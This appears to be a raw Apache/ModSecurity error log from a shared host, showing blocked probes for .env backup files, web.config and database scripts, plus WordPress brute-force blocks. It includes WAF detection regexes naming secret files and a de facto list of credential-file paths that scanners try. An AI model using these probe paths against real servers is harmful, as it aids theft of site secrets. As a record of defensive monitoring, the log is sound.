[Tue May 26 17:30:41.166203 2026] [security2:error] [pid 891273:tid 891451] [client 142.248.80.47:31826] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpanel.plenitudotonal.com"] [uri "/___proxy_subdomain_cpanel/.env.local.copy"] [unique_id "ahWLacDEzZ8z3jtDm82g5wAAADA"]
[Tue May 26 17:30:41.166503 2026] [security2:error] [pid 891273:tid 891464] [client 142.248.80.47:31816] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpanel.plenitudotonal.com"] [uri "/___proxy_subdomain_cpanel/.env.local.orig"] [unique_id "ahWLacDEzZ8z3jtDm82g6gAAAD0"]
[Tue May 26 17:30:41.166589 2026] [security2:error] [pid 891273:tid 891426] [client 142.248.80.47:31808] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpanel.plenitudotonal.com"] [uri "/___proxy_subdomain_cpanel/.env.local~"] [unique_id "ahWLacDEzZ8z3jtDm82g6wAAABc"]
[Tue May 26 17:30:41.166656 2026] [security2:error] [pid 891273:tid 891520] [client 142.248.80.47:31780] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpanel.plenitudotonal.com"] [uri "/___proxy_subdomain_cpanel/.env.local.old"] [unique_id "ahWLacDEzZ8z3jtDm82g7gAAAHU"]
[Tue May 26 17:30:41.166699 2026] [security2:error] [pid 891273:tid 891519] [client 142.248.80.47:31846] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpanel.plenitudotonal.com"] [uri "/___proxy_subdomain_cpanel/.env.production.old"] [unique_id "ahWLacDEzZ8z3jtDm82g5gAAAHQ"]
[Tue May 26 17:30:41.166773 2026] [security2:error] [pid 891273:tid 891427] [client 142.248.80.47:31840] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpanel.plenitudotonal.com"] [uri "/___proxy_subdomain_cpanel/.env.production.bak"] [unique_id "ahWLacDEzZ8z3jtDm82g6AAAABg"]
[Tue May 26 17:30:41.166789 2026] [security2:error] [pid 891273:tid 891462] [client 142.248.80.47:31784] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpanel.plenitudotonal.com"] [uri "/___proxy_subdomain_cpanel/.env.local.backup"] [unique_id "ahWLacDEzZ8z3jtDm82g7QAAADs"]
[Tue May 26 17:30:41.167323 2026] [security2:error] [pid 894579:tid 894764] [client 142.248.80.47:31744] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpanel.plenitudotonal.com"] [uri "/___proxy_subdomain_cpanel/.env.swp"] [unique_id "ahWLaQEtZWuWWBGzl__HggAAAUA"]
[Tue May 26 17:30:41.169355 2026] [security2:error] [pid 891273:tid 891525] [client 142.248.80.47:31814] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpanel.plenitudotonal.com"] [uri "/___proxy_subdomain_cpanel/.env.local.swp"] [unique_id "ahWLacDEzZ8z3jtDm82g6QAAAHo"]
[Tue May 26 17:30:41.169649 2026] [security2:error] [pid 891273:tid 891475] [client 142.248.80.47:31746] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpanel.plenitudotonal.com"] [uri "/___proxy_subdomain_cpanel/.env.orig"] [unique_id "ahWLacDEzZ8z3jtDm82g8AAAAEg"]
[Tue May 26 17:30:41.170213 2026] [security2:error] [pid 894579:tid 894782] [client 142.248.80.47:31738] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpanel.plenitudotonal.com"] [uri "/___proxy_subdomain_cpanel/.env.backup"] [unique_id "ahWLaQEtZWuWWBGzl__HhAAAAVE"]
[Tue May 26 17:30:41.170342 2026] [security2:error] [pid 894579:tid 894835] [client 142.248.80.47:31718] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpanel.plenitudotonal.com"] [uri "/___proxy_subdomain_cpanel/.env.bak"] [unique_id "ahWLaQEtZWuWWBGzl__HhQAAAYY"]
[Tue May 26 17:30:41.170988 2026] [security2:error] [pid 891273:tid 891486] [client 142.248.80.47:31766] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpanel.plenitudotonal.com"] [uri "/___proxy_subdomain_cpanel/.env.local.bak"] [unique_id "ahWLacDEzZ8z3jtDm82g7wAAAFM"]
[Tue May 26 17:30:41.171151 2026] [security2:error] [pid 891273:tid 891419] [client 142.248.80.47:31750] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpanel.plenitudotonal.com"] [uri "/___proxy_subdomain_cpanel/.env.copy"] [unique_id "ahWLacDEzZ8z3jtDm82g8QAAABA"]
[Tue May 26 17:30:41.173080 2026] [security2:error] [pid 894579:tid 894739] [client 142.248.80.47:31692] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpanel.plenitudotonal.com"] [uri "/___proxy_subdomain_cpanel/.env.production.orig"] [unique_id "ahWLaQEtZWuWWBGzl__HiAAAASc"]
[Tue May 26 17:30:41.173137 2026] [security2:error] [pid 894579:tid 894785] [client 142.248.80.47:31696] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpanel.plenitudotonal.com"] [uri "/___proxy_subdomain_cpanel/.env~"] [unique_id "ahWLaQEtZWuWWBGzl__HhwAAAVQ"]
[Tue May 26 17:30:41.173464 2026] [security2:error] [pid 894579:tid 894721] [client 142.248.80.47:31722] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpanel.plenitudotonal.com"] [uri "/___proxy_subdomain_cpanel/.env.old"] [unique_id "ahWLaQEtZWuWWBGzl__HiQAAARU"]
[Tue May 26 17:30:43.179343 2026] [security2:error] [pid 891273:tid 891448] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLasDEzZ8z3jtDm82hAQAAAC0"]
[Tue May 26 17:30:43.503550 2026] [security2:error] [pid 894579:tid 894834] [client 179.43.146.227:51852] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.146.43.179.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "162.222.227.191"] [uri "/out.php"] [unique_id "ahWLawEtZWuWWBGzl__HpgAAAYU"]
[Tue May 26 17:30:44.672800 2026] [security2:error] [pid 891273:tid 891474] [client 179.43.146.227:51854] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.146.43.179.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "162.222.227.191"] [uri "/redirect.php"] [unique_id "ahWLbMDEzZ8z3jtDm82hEgAAAEc"]
[Tue May 26 17:30:45.017205 2026] [security2:error] [pid 894579:tid 894652] [remote 103.95.119.103:57498] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-login.php"] [unique_id "ahWLbAEtZWuWWBGzl__HxQABdUg"]
[Tue May 26 17:30:45.282118 2026] [security2:error] [pid 894579:tid 894779] [client 179.43.146.227:51856] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.146.43.179.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "162.222.227.191"] [uri "/redirect.php"] [unique_id "ahWLbQEtZWuWWBGzl__HzQAAAU4"]
[Tue May 26 17:30:45.568767 2026] [security2:error] [pid 894579:tid 894719] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLbQEtZWuWWBGzl__HywAAARM"]
[Tue May 26 17:30:45.722490 2026] [security2:error] [pid 894579:tid 894715] [client 179.43.146.227:51862] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.146.43.179.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "162.222.227.191"] [uri "/redirect.php"] [unique_id "ahWLbQEtZWuWWBGzl__H1gAAAQ8"]
[Tue May 26 17:30:47.770008 2026] [security2:error] [pid 894579:tid 894704] [remote 84.247.129.9:59212] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 9.129.247.84.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWLbwEtZWuWWBGzl__H7wABiHw"]
[Tue May 26 17:30:47.993527 2026] [security2:error] [pid 894579:tid 894709] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLbwEtZWuWWBGzl__H7gAAAQo"]
[Tue May 26 17:30:49.185526 2026] [security2:error] [pid 894579:tid 894694] [remote 51.91.98.45:44470] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahWLcAEtZWuWWBGzl__IAAABIXI"]
[Tue May 26 17:30:49.404829 2026] [autoindex:error] [pid 891273:tid 891373] [remote 74.7.227.148:39478] AH01276: Cannot serve directory /home2/jhonwy9v/stvica.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:30:49.782356 2026] [security2:error] [pid 894579:tid 894716] [client 223.235.98.214:25244] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWLcQEtZWuWWBGzl__IDAAAARA"]
[Tue May 26 17:30:49.782551 2026] [security2:error] [pid 894579:tid 894716] [client 223.235.98.214:25244] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWLcQEtZWuWWBGzl__IDAAAARA"]
[Tue May 26 17:30:49.841590 2026] [security2:error] [pid 894579:tid 894790] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLcQEtZWuWWBGzl__IBgAAAVk"]
[Tue May 26 17:30:52.256092 2026] [security2:error] [pid 894579:tid 894830] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLcwEtZWuWWBGzl__IJwAAAYE"]
[Tue May 26 17:30:53.508003 2026] [security2:error] [pid 894579:tid 894723] [client 89.221.206.245:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWLdQEtZWuWWBGzl__IQwAAARc"], referer: https://www.anujtradingco.com/
[Tue May 26 17:30:54.601823 2026] [security2:error] [pid 891273:tid 891436] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLdsDEzZ8z3jtDm82hbAAAACE"]
[Tue May 26 17:30:54.607566 2026] [security2:error] [pid 891273:tid 891480] [client 91.92.42.86:29936] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "service.google.com.anujtradingco.com"] [uri "/.env.bak"] [unique_id "ahWLdsDEzZ8z3jtDm82hegAAAE0"], referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:30:54.654212 2026] [security2:error] [pid 891273:tid 891458] [client 91.92.42.86:29942] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "anujtradingco.com"] [uri "/.env.bak"] [unique_id "ahWLdsDEzZ8z3jtDm82hfAAAADc"], referer: http://anujtradingco.com/
[Tue May 26 17:30:54.671197 2026] [core:error] [pid 891273:tid 891476] [client 91.92.42.86:29952] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:30:54.671217 2026] [core:error] [pid 891273:tid 891476] [client 91.92.42.86:29952] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:30:54.696355 2026] [core:error] [pid 891273:tid 891447] [client 91.92.42.86:29964] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:30:54.696379 2026] [core:error] [pid 891273:tid 891447] [client 91.92.42.86:29964] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:30:54.699320 2026] [core:error] [pid 891273:tid 891501] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:30:54.699339 2026] [core:error] [pid 891273:tid 891501] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:30:54.712451 2026] [security2:error] [pid 891273:tid 891440] [client 91.92.42.86:29984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "service.google.com.anujtradingco.com"] [uri "/db.php"] [unique_id "ahWLdsDEzZ8z3jtDm82hggAAACU"], referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:30:54.722124 2026] [security2:error] [pid 891273:tid 891432] [client 91.92.42.86:29988] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "service.google.com.anujtradingco.com"] [uri "/database.php"] [unique_id "ahWLdsDEzZ8z3jtDm82hgwAAAB0"], referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:30:54.760243 2026] [security2:error] [pid 891273:tid 891488] [client 91.92.42.86:29936] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "service.google.com.anujtradingco.com"] [uri "/web.config"] [unique_id "ahWLdsDEzZ8z3jtDm82higAAAFU"], referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:30:54.761313 2026] [security2:error] [pid 891273:tid 891448] [client 91.92.42.86:30010] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/database.php"] [unique_id "ahWLdsDEzZ8z3jtDm82hiwAAAC0"], referer: http://anujtradingco.com/
[Tue May 26 17:30:54.799254 2026] [core:error] [pid 894579:tid 894715] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:30:54.799275 2026] [core:error] [pid 894579:tid 894715] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:30:54.803182 2026] [security2:error] [pid 891273:tid 891491] [client 91.92.42.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWLdsDEzZ8z3jtDm82hhwAAAFg"], referer: http://anujtradingco.com/
[Tue May 26 17:30:54.821859 2026] [security2:error] [pid 894579:tid 894767] [client 91.92.42.86:30048] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "service.google.com.anujtradingco.com"] [uri "/settings.php"] [unique_id "ahWLdgEtZWuWWBGzl__IUgAAAUM"], referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:30:54.832948 2026] [security2:error] [pid 894579:tid 894783] [client 89.221.206.245:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWLdgEtZWuWWBGzl__ITQAAAVI"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1430896&moderation-hash=683babac959ef6b0812e0407a9e1141b
[Tue May 26 17:30:54.836896 2026] [core:error] [pid 894579:tid 894754] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:30:54.836912 2026] [core:error] [pid 894579:tid 894754] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:30:54.858712 2026] [security2:error] [pid 891273:tid 891485] [client 91.92.42.86:30086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "anujtradingco.com"] [uri "/web.config"] [unique_id "ahWLdsDEzZ8z3jtDm82hjwAAAFI"], referer: http://anujtradingco.com/
[Tue May 26 17:30:54.865019 2026] [security2:error] [pid 891273:tid 891495] [client 91.92.42.86:30084] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "greenfood.anujtradingco.com"] [uri "/db.php"] [unique_id "ahWLdsDEzZ8z3jtDm82hkAAAAFw"], referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:30:54.878847 2026] [security2:error] [pid 894579:tid 894736] [client 91.92.42.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWLdgEtZWuWWBGzl__IUQAAASQ"], referer: http://anujtradingco.com/
[Tue May 26 17:30:54.990010 2026] [security2:error] [pid 891273:tid 891467] [client 91.92.42.86:30168] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "greenfood.anujtradingco.com"] [uri "/web.config"] [unique_id "ahWLdsDEzZ8z3jtDm82hlgAAAEA"], referer: http://greenfood.anujtradingco.com/
